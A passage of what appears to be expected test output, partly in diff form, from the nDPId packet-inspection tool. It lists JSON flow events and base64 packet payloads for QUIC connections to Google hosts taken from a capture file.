okpBHj6NRhfYT40cfJ0owXrRfPAsakJrEfIbY678aDECo1jdyeAUnmWY+XbG8o1nY\/4ODgRYgmuoc3IOboNUvx8dTlRVrTI1abSpt63k1mZBwz2PcIo80+jYFQUD8COKs9GGRBzV5HYfMiKnpB8E0fvddrtWuczrHTEHaj+A8EU23AUAoyRQeuZRJ2ND3muZ5PofS2Dkb\/RLqYEnLx53b3gsbjBEhQD9jTXMS\/CkNOxA2dXLmL1VCbZDM001ClSjf0VqrWyNkHZ020vH5Z87sRnfqRjhEFyC6btyFOJe50iTVCZPNiJgpQQjGKjO4rNKkdOhqVKJYV3tZ30pOlvkz82jkWMMrXlfnLtb9s5pzTLv9t0tUOoQ4QgbRKhgDzve\/xApJG8bUCntJD7lpC
Ax9F9HoZMq40CxcFnF2sEh63lTmmld2YtjKFNOpA3UantQuZCNL\/CmftmHYYLrD7QkKm4TvXgbIR8RxVZ+EtiDOPLtHOx6d9B7dMcTY3Mfmi0JILNHIfrPCWog+RxVMh6d8lhNxI62zpKHPU0Tg6vqeO8SzyLB\/n8diVDpb66xI152GpmYVi2GA2rWPfxVjszVl5jtF3gWEj8sOvNX3xomkTvDqEIOlWFIFjdzSMYAaE\/94dpPwrnlUXOlwVZbLyG8zBkrVJIJEL0VFlCRP3cPWR9GCwyqZp3TvaFXw65QoKcuAiLNfsKEEBT7thsxAP5ShRNnKnAVngImJT7\/QyRjMLgNdZQiVPKJgKxlHmR4CKW3EdPdCekSxLH3DqHQePQJoWyWmK2uMuElqVzImkMVeqUtVe1Z7XAmQ74ZmJX77RfTpYOUgTJWLw8yAw1CjfU5hA0NqXKDuF\/siEDZ0glp7FNdcWvBjbo\/ABe7QhVen4FOuDzJ7O3om6ZklR7mLYelWmYJHFfypdJF0Xj+hmRP2HWSSx4\/j6XqYC2eVviMKbyBDVQQPI0EM6QnNDTPPWP8a+XfmtmdlLc9QgUY0RmRpsrtKa+1IyPqG93eGTD+ZSsMgyIEQWA5Fm5wsK4NEmZ+pC9UWL57aEkWkIPEN4XlJ\/9JPPb3uZ2vDE\/Va0Bb1Y7vNFgBYQGZaZLzo9Gdz7yiHwLVKre1BC0kz+KfDM03+0yKx5CFVmJ\/kBO0+wIW17IRrXQXE0U0ProK9hPHRKvARb03bAuREr6TJR10+JsF1ImGW+lnDDK1\/FtTCgnzrxyWlFZM3Cg6kZN\/6ZrM2A49rBarb0aVirmITUvU59YafXCiT9ymjQXREvUsDHNYJ68Utiz2AdjCI7phJ86HXYCIFDLKUZ7rKmhC6fjynuAGp9kfCbPkPfnqyMDrXIJ"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1621501261082,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261082,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVMVAAH4RQ\/6fdbB8z3k\/XPqGAbsFTnp7xf8AAB0IqwzBH+7SJ6oAAEU0QCGjYmqsUMXHqnSGAa+SGBqQKewpsFPBcHbIO1VQVQmdi3mM6XPwhlgoWrccirvAt2h4VgoFMSMBKUnjc\/s7c31zMKNVAjGwqSS9UcMQe+beIWng48oRC5FQxFxp76d9NvJFZQrnobOu9\/OI9vLd\/kjxzUXkKaoMqPw3HA3NrHDmVaI1U1G916dAe3tpfhldRg8TG66kkZbvUPojfmBk6b2Z19o0wD3eL3ArF1ggKa7dtmOX3vPsGSHppdsAwy05mrGdBMogG2GNPoz1f6Mrx1CryOOeu7sX8P0doH1Sq0iFILD1hylRmMMZ5Opz0H2bi9KA7w\/Ag2fPK0T9oDIw0fFaoOFIf0DJ+lEFoJl+bUaUeYjpiNWRiJKG6uA\/8tslFXAk5id\/lQWKSBH2JicuyYgt3WXJe70ZAzp2iJ\/c\/DtJGyES\/AMV8JsInY9TNZ4RXPUu+I\/eX7SJpitBsTdhCEwJGiE0dT1TYgPIAD7IuBR125WX32fSO6pJg\/SC52+hata3geWR8gYaq0AXNqoDGePDO
kIXu0L29JvXGLb3VjgkzsU7GDWMMiBS57s7K1nDWVaICtgb8tHvX+qm2yAEqxNTZylYIiRmNXEmMd4aEPfVCDRnoLnzwSUCqP2hNYKZWNP\/L4ttvwS03mes81iB3GFItzHUXUjDko+av7CA0J3KO8YO\/MegXhauhWaOMhTq9siY897rXz2nMEjgxielkq2WyMK6PT7GQGMUlCvVs2Lh0wr5fTdVSGH3n8y5kmB+Cpz3AWzqb0PCrL7nfp1ZQdKXBaV+\/8ls7T8As7zUGDLh1cEJLF5+OvQcPuWBETyYL6v6P0nP5uBkBK24BlVWM\/6sea6ivZVTU1ytJuTc4EW8eV7cOfQv3Z0ZvtO\/E+dtnWbRbm1+xnHQSTJejv0j+x\/5AGS7d9EBuJMkNcE8AQ4pldxgHz7Ptlg1BHWeyw3V53MEbQaaKLxV0WAfr2iBsH3t5M6hAvRICNnnoroLK7ICwfeGHvOCdHXa+iqtGu6TGnIJmUNgGQqP1S8MgI4WSJKg4gkxYOG8Yq8I6m3HzLsup78oZ6bqytrclhVLejrz8Tk1wQFWeJGz1cSVmJ7dlJY4MD8VT3IFiybLNnMNNe7YmlJus\/1uc9POON3uOlN0OXN57myRfkJk6aARYP\/VFYz2zQVzhOYWEpCg54BznwVNZxFF0LMNmGI2PVN06DbNXX9IxLaS+ptZnDWUEZKgww7Rh55OBQLkyONb3AXu68OQa9KfW6wKnH\/vmE8HYT6n+SXcK7GycIHau5AFjik2iCmv0VvdznzcaYCCq0Mfet4dNtH\/YoT\/I\/YrfjkCWn9TD2GpQpUNvMSERx6JmQCcnn6FUkuIqIOwQZ7TJ4fAgdop2a8RuxfgczRZ1qfymdRGBK2o+W0zafNFhHNk2SYmyvsZ1V8VBf\/oEixGqVnlZ\/Jq+d3sW39fHCM7TJKwcTtcBclxaa8fGLAAlW9lwT0AQAwjaArlz\/6Lw8tnHTm015jYFYAA5vZt1SyvuCzOL1voALV\/+nsbl3\/ONSPNJsDGJadYCDcjqbyAwc3rD2eTlnRMOCdPOfDkt6aPuNtwIQdnKz2fd4z8axtKYuzjc5dW0Vg4zcREoGQwXF3Mlfi7nUkcrBa7blnobGRnU3R82Mb1vEB9HojGcsN+QDpwTPjHZhspz1V5NyHgQ7hab2FBtan1NhmTF8w7rDqqAwRtjT1cqxDw9C9TkgJvOeDw\/J5ejOyPpxUe1E98wc8RMhxL8HbUxhU6"} 00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1621501261282,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261282,"pkt":"AAAAAAAAAAQA2OESCABFAAVibSVAAH4R2uk0uxSvypibefAsAbsFTt60w\/8AAB0IZEtuMTNmxFAAAEU0LH9lIIuMdZ7Kq5MCzCZAEE+168Yufakbt9pK0ksbFQo5gOkiaZtZmGL7ajorb6dlvPftlMSSvVuPm3GtlmjJiRJfcfSv6WCOpmfO2v6Vi8Gqe2z+CCwK+2m\/JLswIRcEtxYUQTR+mGEhGLqGsRBSch\/o0S7SruCC1QzCSC8G53\/qUYvkz+bnlIyDwadCcS+Bc5KcjL4tNroERGF7KikT1T9sF4XsS6GZZ5vImGfO3EkmUp8XE7jlVo8hS1am9\/dWmCCc\/5UVFDsBeuTG7wkgrb8swjB0805Wj9GAKKohjHey69GAIKPU3++2Imdagnr4acCwOFCrohzIIheL6xgOuccLlkxDVLjv32FfUde9yJXpLDBHMt76\/rduX6hlX68l11YNKGEr\/zkJxTj9ypa0blphHmap9\/VBxt4j+qGvE8cstJqh+0IpvOAVwU9lYmLuMLrq1nyWotlAq9mRnhXu+BQIbhgiYOfa+NaU9CqMuW+zTjv\/orQq5ERGPyXLWWaqpnLvACGfb9O5GE65tq9zbrPCgxRqZkEBql7CjsnZhZlmCr3gHvgCBq68gfxQu+39WkMzkvkbP8IALmggIQ7VQf8BFdayRba+Un3cP7f07rfoszy+m8D\/z0DW0SQgPeYsF\/KmQko4DJ59g8KzGl0re9gjZRv5RqIECyhlYHWJ7GyL1p6bli3WeNOhxQJ2LLSs7R5C1m3Adc0j0XFC1pB+sAW\/WEd5oLl9Hwjd6M0MklHMK0LYJJtSeHujnXWGQ8zBsv7diOFCmysv3C+aiX6B0P9ogHiAroIepHRii2maNhtRux1yyqTbuXMBGnRPqFAWbVaJQnNR1GwNd+qPfEmyFuIfG3xnj0aeWVINv8LvYzmYdOSTc7SL9gqYuvzHxRf1+Upzh4eF5QSLoWFnXPXL3449L3q0i+u80g9dZ3zpdrqQOpENcencZZGYbAgeK541RYNNro8eF8HwnYPBOIy\/Zl55vIK\/DEhSHnDpLGsakuI5sKTjtOeDx8DcJWgQ1BpawPb8oHOX7RqPhuxoKHRxFskxCDjHJh3ZT2U7YKpwgythqKBDauWw6V0hLNf6LNYtE9ypEHgKJ6trOXxgEDjS1iVFjdsX8YQ6+uIw\/VczFtSfg\/SPICVvTLXIAkfbMpSXSpbuwtaktICU2t9lJxcQPW3\/l2RVQlQ6A9orYmKqPcVckVDM+iHEIyMf9H4+vCZVgRIIICMwjlkLV5tcwaX0n7fRUHrmKaF8bEP9rGW60wBvfzerDhS2zUGBYaNPcvoOZQT2ZC\/EK4cXTZIBKvBIyWC72OiMtkS12h5aaPAtwZ6n2dXPCOk3d5CPWaaLjKOIMoQxRhJPD+tcF5lq+ivLDIhTHUNk3nCiT2ptn8sF5bPoqGsz0vo61bRIdmWMMojjGxrRSN7\/n7VJ7xjrskWBNwwKUBcjdFlM0H0heCJNg1grIB9Hn\/3GIWzCFZQ4M
K0h3E8LnbseAq9C+ciIX45aTl8kFGqoSHjTiIRX1LhP\/Ej8fNDVJL8xCvYIK5uvMb5wfu4aPiMKEV+qyT2Ru5KgH3hlAbiLVCIDHX3NwF+qehB6sfUut4lougpqanWJ25xwUyKgjA21oplysL84+Pde6u0fQ1tsE4nXneYYoZdfcbHNS2+TcLpNnevmrlv8oGUF+IHSvQ2pys4po2Ft+zwvHiZVRUCkyaXat54kiLBaAYSl8PWx5iWyAEXxmiBRpM1GFaKzxBpGVsS6lfPmZGj\/E0GSH9ahQaWLKvJL1xv+z\/y5zk8w"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1621501261581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261581,"pkt":"AAAAAAAAAAQA2OESCABFAAVibS5AAH4R2uA0uxSvypibefAsAbsFTsIcwP8AAB0IZEtuMTNmxFAAAEU0JZ1KfLVI+JBmlx1gc1nZ06mlDQJxsWyoA2bzQbVVMhPumzwO3ZAR98o8ZPo9xLCUDTzGpsR1VmkqScVjzEZA\/RjIqIioWENrjUeZOvFpfzQMTLEtfK1H5gSkSzr1d9deTBzCPCECHyoWo01URci3jW51V0HbjDnEJD1I8iSzapavqXvkm7q\/CkPAOKz+EFk9ddN9tvBAUK+D6ra\/NoAZo9xXayAuRyx3iyJFB5EvlFUz1Sj7dTVlS5+TdfHDF6BCtxu\/3b6UGPME6BE0mv1zrD1kdQyNtPuDIptySY43Kas3SgvX\/I4v3DNRjU9o8CMW8YMBriuPdWaursmVudUTJYnB0q37mK+lxWkIltSWsQNuLr5cp6c4Vru0wwO0Ame+VygNGHbkKKCLw\/51hBpKkkTptkPAlMSaQQtKQI0OPuk7ItN4VrB+m9Vkwuz17+rymkBrFyMhsKcJIjj3luZReWaMMeNdN7r\/9xHAgrWKyyA3NzqfpYemGPDltByS1phr383eIdP8f5Ze0Ac0+tdcIJ2dWvbXqHhn3dZjhSk0HZZGEHnio7bqsyCfy\/wl3pykgp8G87hcfpY4upvLLmQRm6zklE2ZcD8mFhu4pD4VtgI4q1NkSPN4ENjVSltM1\/G\/SJCaisjk7\/TaytPYDocBazw8BpeLBGuMrWBrDpERso7obnHeO8wf+Lzqup7YnGDMt9vWazQbf5KRZY344vRrcxm8Cgm6xrf7EN0vEZrGdmbVtBvFwjU01hxeAVD8m7tC88nDxYD\/Vcms+kgEHQFUG5VPiMI1EaEjp4uM84vZhZhC6CDRHypPGw9HGqiPK3b\/Pd6yKRggtZr\/oWcBajQm0w+tBJKdOv7x6ZSHD5PhdRlgANNg\/jeNfdV0X5QnhkLi02ZeZq8yEDPFn9a3Lnz57TXoXYYfH6skWRGwGSQ2xHufw0DtBDB91pQTHPRFqigTQMOkcbUHvQ9FLSynEnElkdYIwyDeYl1wlkOI3z6haMDXB1V3RpZHuXa5GdOGVPCXKGY8TvCCd23w7RNdvgI0SAkP50qXRP4Kk2X1AVVlqpYf8FwiZi9W0HEiDmKaHfCa6sFt1\/rgrqUUw5ELhzKrL6pJ+lTg3H5NM0cd0C4hTHBtzSm3C5D7f92zskegG0WyFRw1Ba8N8vzkk3+Qhp\/je68IXQzCUe2u\/EtUX6CQYfCYIoWtYM8z5STiqZadSz8Hcj8gkMjUYbOqoFONvZacfYEHB0S
ARvuLReB4iTtWuIXgjYJcb5Qkm+SBb46jf\/04rZRrUrWfuW4MRTyzVXxCithuxVhs4F8PHfdPTq\/LCBBTHWDTyCQfTKVPq8P8t30ZnQWxsuPjLcSqLk2yTFwMtN32Tpl6KkT++kfElEUN8g20QBH4D3nsWOQyXh1qp6BLTCOt0IKBckhyNskXvMkS9f6xJSD6uYDR8gpfSiiduxVMENXsD+aZg0sKhc1tnhY564nzvmzaK5pK\/mG4HpcEZaoQlPnN9CVVFsxc\/AdJrQTcfRaJiP8\/\/Yg3DwS0RE3P4jvs8+29fssz2Vycvc4CcLnL6CYBjQV+ee549uL3GVp1M5HV3WkcafyAbynhL22G3n+0pOA92LLDWaPxdPw5GuPkVaJx0v0qoyE9b4AZ\/f7JyiBWPsZeIMB4ss18qfbar1+hhPvrhcG72WrRn1MOHBG\/UEQi0IsO4yKvwqiblXD9HjT\/0dhqt\/RFTAwug67Fa0M1R4Gf6vwbZT92OzvcYVJR3zAK+LRbdOlVy90zr3DQGbvb"} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1621501261682,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501261682,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVOJAAH4RQ+GfdbB8z3k\/XPqGAbsFTv9fx\/8AAB0IqwzBH+7SJ6oAAEU0U9sthnA8M57fkNsMeJ2EE1SHED6gJhbQN4BfQJOO1PjffFq3gtFk4IyP8Wth3mraFF35AS\/mCSP5GPdO\/bY3uB7Y7VeiLUEY9IS2dFIrYZfbf9ZQsemW2z0+VCxvN2Db9C7578kBNAZHcZiUcQFU7QlwuGC4nwNjsiuK0SteLVHFM0d8O27xz2JpZUPDhtvrtHPERZTudFi1Sej11OjXXeMujoumIvT2OYdCj+X0NfUPlwu9sFCLpzinhlfbOthWMWB8q\/9N\/OyqjEr4qbDQGFnM\/Hr8eJUBkqVZluSAYj1Ywh29XdTMOcq5AUfmyV1X0sTrgeDtnbqi3godsTwx1QbwhKBj2dWTyYyHTDajH+2UBid1GebdhLGSjjnKxxAaaw6EFgQmpu7koEqoPObHp5kFU7wjAY8mggUyFBVjUIfNBYhWssGwyT5Z\/r5OGZuX1rx6tRJJm6gIeL60FE9LVHmgWUsYaHuVYpkqJgZrs8PzckQh0niaraVIhLPsP0c2zyZ8p6k39xAgrRwfx\/Zh9nPNn3qSfxXEzLRxlRYWUsplPXqYbIcReCdkDC\/N5gL1eP\/jiLz6QU52SRtg8taUEPRtc88DYo2jurpisQQ15KiRpuliwmtrhW0HqBvzdAZZarXSjJIjkWxLUUFMahlxZEceLNdSqe7MdK1UkaKw83287xEiaSEO7eTUM+\/wBRhGZf\/1DB70GE\/ULxXMbdJn9jltiavDAQNSyczf2+nbYlnG1N6O1TcuG42rxaHRd6KknCvWSCrAhQM\/VqLCDk0bY2mxWybhrjoGc0JuiCMFsYr+5pV5QRoX4Lq+e9gqBFnp3Uaem1xfnlWZMvZVrfurPDH1T3I4Dx8IroHaQ2Bo5DvKOdsiFkfzx2DBIq6SjpXaCsVzWBgmVAE9DRo2pY+eROHEOdfo8\/FB
uCZXhbIlRq1heZJwhsmlY+7e2qNgtpC5DaW7zKw1HKVB0RPYT7VRcRTNl2g+fmbYvt3YQzNlorcN9OrbGF4EZ32C93f4\/HUQOVFV2yInR8hfRvuHsywq5N9zdnMDFx4UtoGC5\/JPOmqIglqIM9o0AUrBq4GdLXhfYvcFRKKHwZ7TRsYLwmoMgHWy8jwfHZhK1htPPyCu\/l8XN40QZGFptNt7D40U7OSwWUN1+psHOjRZWv6ST7CMmleHqyEPl1KLs2mifOpHcy+gSFbFBD6LLuLlmcGxRtETjrnZ7+bSuE+Zt8ruZaaGcSfNYzrqd1zOq56HYPd6nlE\/mmgkW8AFD4HgObgvdcHAI+BQl2HO3lTApnJPdlU4\/6LGlTjc\/Xy6ZatrCgtI9vY0+cPbiLZUSCI0nkM8mmbA2A5MknAZe\/w1hAi0GLW9UoOUSrCzacIaeo9N2SakmRlQF7OxrccNFQQ\/UxrBENXiSn8dd3pbynfOPUKA8bLUE0Fha7t882zmf3D2IV8UDrWHqT2rFiv6k3POzwJo9CVhSImVzpyIro243Q09zk2kOJxu0gB1BHDvYJrVOYEpZLmGM4H5HwzOJAsaUidoe7\/oRQyD8W5INMmeQBEWvyryJW11xgcq+r4ORSm2VIuTghtDpCYCC2hC9f+Dlxwu8h6CMW3kWH65itA1vwPXB6v+afYS01KWtxgI6eW\/NRjdMoX0SXGogIM7OSPQVVfkk4D2+dJAm44\/U0Vl4ZMoY08TeAfdXHgiERB0dXg4yr7L237fx9MyFJtNMScYo+op6Jjwo90fx4MlC9rlwatwxaF9nbgK0o\/x2ee6fFva6TLmGaGSkDA5"} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1621501262182,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501262182,"pkt":"AAAAAAAAAAQA2OESCABFAAVibTZAAH4R2tg0uxSvypibefAsAbsFThjAy\/8AAB0IZEtuMTNmxFAAAEU0P4kZL2JzcQJCkWJO7BYAvn7jOS\/oPDLLELaAGZjPfdWe+CTrIzdiC9WRX3rH+cQNjCKbZa53WspbrWQ3y9Iddgk3mFf\/\/P8OYcu5S5eZdMR9fbh3X6m7e1P0w349oYB4hiM9IJyVYjIofcoBFkKxh\/5ebxmzh+XjVHAni37hnczZyCzMbpvTaS5Mo2\/ZngECyPdTH4R55wpjirrbqawWK5BXgasVyeycq3PgcjRIEDZMmdGuCfn6Or6mlQ5Oi0gPVZivFAfQTbBQpALI5TF4c0OEuWkV5PvIlcn\/R7+MoVcxfy0r0Gxfy5DTUZSVKcVUqd7yhkU9aooVQ64ePPS85n0Ao6nJaHk4CEcKYTxXKFGTV\/JRmN1fStNbk6PuLzUzSKy7W3AsorHxQi\/LmRhIln15AQZY9aFzjxmdp89pwdjIhQaDCc86JMYVdSIXjTQq8957N1jOVphrIDogsXbfM+ETcmeLbNKqN4fwVd+mT\/89Wjg3KjoISCw7cizx3pwneM1IZWZxw32ejl27XFc+DeXbCTyms0wwx5d4mug4d1+BMTCaWAoTeBSMDXB0j0tkDNHX2xtWAXf8\/UuzEfOvYCbb04iQFTA+2Hyu4GRb
vJwOTWHAb6Y\/V0BD9+rx2H6RD7LGvrHh+f8uY0EPosNsFiCs+3i7J7uh6lA7HBXpprFebhJ4nBFU5ogCjUR6v4cQw9N50B8pFKaCLLkzxxoYWvp6aFiNZxcUELv9ZUwZSWCw5u9TxfZdk+lnaGdGEYWUKBNrO4TMaapbDNq4j7Vu95JXokG49C08JF5JMM4\/z45it8ndhYZEyZbzHD2yExEQ\/VN\/mKUwF8ibUn2C67S\/5tn76v1S1e7HnOhXa9tt7ko7BC5wl0mN\/vl7Boa7BeFOH9ChJqMRyakFr8qtdw7Yu8g3vIiwJEWJpLTwekZqiekCkjohBvin+U4rI8Z4iedGc5HpW5HGFoexz0CrVl5wTxzNhI8j0IRw+jVswS8qYTpoGTz3OrlpPStmJil9HnykMux+BL5xXOZ617kkr3QdqqRshG\/RQrR8s6QAYGI71oEFLMM4TOShFAvx7OQRDnnJcVkbGzqXs2GA+ynEHK77vOrqNEjJpn4aKnbZnLLPOZDQS24eO\/QA+vv4uiLfH2hoxa65Oz8gK+JnY4IVu3sZb9w57SJTYpFHSRkiWRXzCJ\/sWWaohJYMR8PWJxuCKDHkDpOYFa4Gqs5Z2wJN\/RR3okXqWJS7yxFbWwGA\/Ux6HYdQ3Ct6YGwLA0DbmZnkDdT8uknz2+RUM8H5unZqgX4DQ6X6XF3z+e9cZs+qvkrBFmI7iTg\/AWeOO4DzvapIASiBIUwtJXKqd88VrnmgGNuzFGO317nsPM\/31UoR27Yt3dsU0KGRIpm65J\/+Rpqv+FCFt3c\/28P38sc1iZpuj4G1ByY3uO9KITABAM93OOoXZVsw4nYNriGxowgXJm4ZpYPg6mQ2LTkJ1L1uH0ng6enuR+XlH1t3Mdwkm8\/\/s+srKemwScHPxez2jonymTIlyHWEj43rE3SOOstfJJIdIbioCt5eaO4rJ\/ZtzFVP3GREeo2yr+vwPjDBvXv+9IKyIRXu1pKvuEupgzLBzLb+08gepp2KupXz5AcDO7p5JSUs7lVhZLWrwC\/4LgHlJK00\/IeVej+hl6DABvNdRucAzmPdswdQTBDGuRv2XQeZ5xK3vAhBPzvMWU8ulKLrK4WenJ6YSemx045mCE+N3D0BzGu5PxpiypXC1Fu+3yqrqa1cp13uQg0a"} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1621501305362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501305362,"pkt":"AAAAAAAAAAQAtexhCABFAAViLHdAAH4R7mqfdbB8EM176sqQAbsFTpTBx\/8AAB0Ivw8tm2Ku7RQAAEU0Z52IbyPObDKu7BbGHFwXmr\/rz3QfyBRTJB3p2RnE9UysoDSL0A3iYi2pNKedwkl5mpvF\/Vk60tFlBZiFzkrxIN49ZjHA7MZQYh4BUIyAfPPuF03+ZMM0Su3qn9AiiUpsB+dNsu+962VPg19tLI\/VV6H3PHsG4PuMw4cn9i3LGYoZQn6aHv1YbAMYupJTDvNFcb2s6pFl8eB\/z0QA6+\/NcaLseMUOgNf8TfMmV5DJVFMWinQmIIE8GPttZVUixDh1PXr9\/XOfl5MsudOHGbS\/BoKDVUuxmXWMLXGEKU9H0vMlsYLhLUm0c3MDnKGeVSrkeYvPjroMfaat1Tiu2LmC1yjTT8Uvh3DZ3BJLLDzubsslmJNrUgLURH5a1TFkvH9Q96Xa\/CgdBXGH7ShdRTQlh7Spx9l0kHtYDDWtdmymj3cp0EdEjn\/au5ybI8UfXEQ40NFe\/bpqHpIm9OIaPawLRKnKVCmPwkTkJQmFtLRT8FIc+hxG8+42VlkD9SVwOketnoEDo67L6UjWGJq8Y0bKa6DKJrJHKlb